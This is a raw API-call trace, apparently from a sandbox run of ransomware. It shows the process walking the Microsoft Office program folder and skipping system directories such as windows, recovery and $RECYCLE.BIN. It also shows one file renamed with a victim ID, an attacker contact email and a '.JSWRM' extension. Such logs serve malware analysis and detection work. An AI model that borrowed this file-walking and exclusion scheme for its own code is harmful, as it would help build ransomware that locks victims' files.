(lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msth8FR.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8fr.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\msth8FR.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\msth8fr.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0139.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0139.848] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf13e86a9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13e86a9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5972d3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x54a000, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msth8FR.LEX", cAlternateFileName="")) returned 0 [0139.848] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0139.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0139.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0139.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0139.848] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd41f54a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdec90856, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xded02ee7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14c660, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PropertyModel.dll", cAlternateFileName="PROPER~1.DLL")) returned 1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2=".") returned 1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="..") returned 1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="...") returned 1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="windows") returned -1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="recovery") returned -1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="perflogs") returned 1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="documents and settings") returned 1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="$RECYCLE.BIN") returned 1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="system volume information") returned -1 [0139.848] lstrcmpiW (lpString1="PropertyModel.dll", lpString2="msocache") returned 1 [0139.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PropertyModel.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0139.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PropertyModel.dll", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PropertyModel.dll", lpUsedDefaultChar=0x0) returned 17 [0139.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PropertyModel.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0139.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PropertyModel.dll", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PropertyModel.dll", lpUsedDefaultChar=0x0) returned 17 [0139.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0139.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0139.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0139.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0139.848] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd504421, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd504421, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd52a5db, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x78ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PropertyModelProxy.dll", cAlternateFileName="PROPER~2.DLL")) returned 1 [0139.848] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2=".") returned 1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="..") returned 1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="...") returned 1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="windows") returned -1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="recovery") returned -1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="perflogs") returned 1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="documents and settings") returned 1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="$RECYCLE.BIN") returned 1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="system volume information") returned -1 [0139.849] lstrcmpiW (lpString1="PropertyModelProxy.dll", lpString2="msocache") returned 1 [0139.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PropertyModelProxy.dll", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0139.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0139.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PropertyModelProxy.dll", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PropertyModelProxy.dll", lpUsedDefaultChar=0x0) returned 22 [0139.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PropertyModelProxy.dll", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0139.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0139.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PropertyModelProxy.dll", cchWideChar=22, lpMultiByteStr=0x241178, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PropertyModelProxy.dll", lpUsedDefaultChar=0x0) returned 22 [0139.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0139.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0139.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0139.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0139.849] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4f7cb47, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x10e0d0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PROPRPT.DLL", cAlternateFileName="")) returned 1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2=".") returned 1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="..") returned 1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="...") returned 1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="windows") returned -1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="recovery") returned -1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="perflogs") returned 1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="documents and settings") returned 1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="system volume information") returned -1 [0139.849] lstrcmpiW (lpString1="PROPRPT.DLL", lpString2="msocache") returned 1 [0139.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0139.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROPRPT.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0139.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0139.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROPRPT.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROPRPT.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0139.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0139.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0139.850] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2169a085, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2169a085, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe8450, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="protocolhandler.exe", cAlternateFileName="PROTOC~1.EXE")) returned 1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2=".") returned 1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="..") returned 1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="...") returned 1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="windows") returned -1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="recovery") returned -1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="perflogs") returned 1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="documents and settings") returned 1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="$RECYCLE.BIN") returned 1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="system volume information") returned -1 [0139.850] lstrcmpiW (lpString1="protocolhandler.exe", lpString2="msocache") returned 1 [0139.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="protocolhandler.exe", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0139.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0139.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="protocolhandler.exe", cchWideChar=19, lpMultiByteStr=0x241060, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="protocolhandler.exe", lpUsedDefaultChar=0x0) returned 19 [0139.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="protocolhandler.exe", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0139.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0139.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="protocolhandler.exe", cchWideChar=19, lpMultiByteStr=0x240fe8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="protocolhandler.exe", lpUsedDefaultChar=0x0) returned 19 [0139.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0139.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0139.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0139.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0139.850] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x7d7750, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ae68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PRTF9.DLL", cAlternateFileName="")) returned 1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2=".") returned 1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="..") returned 1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="...") returned 1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="windows") returned -1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="recovery") returned -1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="perflogs") returned 1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="documents and settings") returned 1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="system volume information") returned -1 [0139.851] lstrcmpiW (lpString1="PRTF9.DLL", lpString2="msocache") returned 1 [0139.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0139.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRTF9.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRTF9.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRTF9.DLL", lpUsedDefaultChar=0x0) returned 9 [0139.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0139.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0139.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRTF9.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PRTF9.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PRTF9.DLL", lpUsedDefaultChar=0x0) returned 9 [0139.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0139.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0139.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0139.851] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd504421, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd504421, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdecdccb3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x151448, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Psom.dll", cAlternateFileName="")) returned 1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2=".") returned 1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="..") returned 1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="...") returned 1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="windows") returned -1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="recovery") returned -1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="perflogs") returned 1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="documents and settings") returned 1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="$RECYCLE.BIN") returned 1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="system volume information") returned -1 [0139.851] lstrcmpiW (lpString1="Psom.dll", lpString2="msocache") returned 1 [0139.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0139.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Psom.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0139.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Psom.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Psom.dll", lpUsedDefaultChar=0x0) returned 8 [0139.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0139.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0139.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Psom.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0139.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Psom.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Psom.dll", lpUsedDefaultChar=0x0) returned 8 [0139.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0139.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0139.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0139.852] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x2169a085, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x270a48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PSTPRX32.DLL", cAlternateFileName="")) returned 1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2=".") returned 1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="..") returned 1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="...") returned 1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="windows") returned -1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="recovery") returned -1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="perflogs") returned 1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="documents and settings") returned 1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="system volume information") returned -1 [0139.852] lstrcmpiW (lpString1="PSTPRX32.DLL", lpString2="msocache") returned 1 [0139.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0139.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSTPRX32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSTPRX32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSTPRX32.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0139.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0139.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSTPRX32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PSTPRX32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSTPRX32.DLL", lpUsedDefaultChar=0x0) returned 12 [0139.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0139.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0139.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0139.852] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc348b22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc348b22, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdd01a5a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xe7a68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PTXT9.DLL", cAlternateFileName="")) returned 1 [0139.852] lstrcmpiW (lpString1="PTXT9.DLL", lpString2=".") returned 1 [0139.852] lstrcmpiW (lpString1="PTXT9.DLL", lpString2="..") returned 1 [0139.852] lstrcmpiW (lpString1="PTXT9.DLL", lpString2="...") returned 1 [0139.852] lstrcmpiW (lpString1="PTXT9.DLL", lpString2="windows") returned -1 [0139.852] lstrcmpiW (lpString1="PTXT9.DLL", lpString2="recovery") returned -1 [0139.853] lstrcmpiW (lpString1="PTXT9.DLL", lpString2="perflogs") returned 1 [0139.853] lstrcmpiW (lpString1="PTXT9.DLL", lpString2="documents and settings") returned 1 [0139.853] lstrcmpiW (lpString1="PTXT9.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.853] 